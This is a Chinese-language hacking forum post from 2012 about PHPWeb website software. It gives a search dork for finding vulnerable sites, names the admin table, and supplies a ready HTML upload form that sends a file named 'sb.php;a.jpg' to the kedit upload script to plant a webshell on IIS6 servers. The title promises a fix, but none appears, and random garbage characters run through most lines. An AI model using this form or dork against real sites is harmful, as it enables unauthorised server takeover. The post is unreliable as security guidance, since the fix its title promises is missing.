中国网络渗透测试联盟

标题: phpweb成品网站全版本通杀注入漏洞及修复 [打印本页]
作者: admin    时间: 2012-11-9 20:52
标题: phpweb成品网站全版本通杀注入漏洞及修复
关键字:inurl:webmall/detail.php?id# u4 v, T$ E% d" v7 Q! V; `
( K  e1 D/ ^/ ]; [
数据表:pwn_base_admin, e2 T) Y3 y* R( m% o3 Q6 `

+ U$ f% [" d* N3 h4 d9 W关于拿shell1 P. Q2 k8 a4 h/ x" D8 c
. q# M' @% b; w; o9 Y
首先登录后台admin.php
+ `2 q0 ?# `" `4 {; V; c! {5 o9 ? ( d( o3 O$ N3 f' I0 a4 y
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。0 L4 W- s( a" P1 E
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
0 H: ?' Q* \6 Y9 z& Y; `然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
: ]% d# H- w% N$ w+ s- c6 o, v5 W<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> . e3 l. S" G# H' b8 M0 z
<input type="text" name="fileName" value="sb.php;a.jpg" /> / D7 A7 J% P" e7 P1 `
<input type="hidden" name="attachPath" value="news/pics/" /> + }  d, Q. Z4 L- E" e% e: O" m
<input type="file" name="fileData" size="14" /></td>
# c! Y9 ]2 A& i9 n& i( e7 R<input type="submit" name="button" value="确定" /> : q% \# s/ b4 n7 X
</form>; _; R. n% h7 }* |8 Y

! [3 o; x) C. B' T首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。! R1 q" G. o1 A; _" {0 h) t

* Y2 N7 }" y" V7 _/ {- b) d& R) b



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2